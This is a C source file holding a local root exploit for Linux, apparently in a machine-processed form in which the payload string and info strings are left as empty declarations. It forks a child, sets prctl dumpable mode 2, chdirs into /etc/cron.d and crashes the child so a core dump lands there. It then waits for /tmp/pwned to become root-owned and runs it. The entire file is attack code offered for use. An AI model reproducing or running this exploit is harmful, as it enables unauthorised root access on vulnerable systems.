
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {scalar_t__ st_uid; } ;
struct rlimit {void* rlim_max; void* rlim_cur; } ;


 char* INFO1 ;
 char* INFO2 ;
 int PR_SET_DUMPABLE ;
 int RLIMIT_CORE ;
 void* RLIM_INFINITY ;
 int SIGSEGV ;
 int chdir (char*) ;
 int exit (int) ;
 int fork () ;
 int fprintf (int ,char*,...) ;
 int kill (int,int ) ;
 int prctl (int ,int) ;
 char* pwnage ;
 int setrlimit (int ,struct rlimit*) ;
 int sleep (int) ;
 scalar_t__ stat (char*,struct stat*) ;
 int stderr ;
 int system (char*) ;

int main(void)
{
 int pid, i;
 struct rlimit corelimit;
 struct stat st;


 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);


 system(pwnage);


 corelimit.rlim_cur = RLIM_INFINITY;
 corelimit.rlim_max = RLIM_INFINITY;
 setrlimit(RLIMIT_CORE, &corelimit);


 if (!(pid = fork())) {
  chdir("/etc/cron.d");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);


 sleep(3);
 if (stat("/etc/cron.d/core", &st) < 0) {
  fprintf(stderr, "Error: Not vulnerable? See comments.\n");
  exit(1);
 }

 fprintf(stderr, "Ready to uncork the champagne? ");
 fprintf(stderr, "Please wait a couple of minutes;)\n");


 for (i = 0; i < 124; i += 2) {
  if (stat("/tmp/pwned", &st) < 0) {
   fprintf(stderr, "\nError: Check /tmp/pwned!\n");
   exit(1);
  }
  if (st.st_uid == 0)
   break;
  fprintf(stderr, ".");
  sleep(2);
 }


 if (i > 120) {
  fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
  exit(1);
 }


 fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
 system("/tmp/pwned");
 exit(0);
}
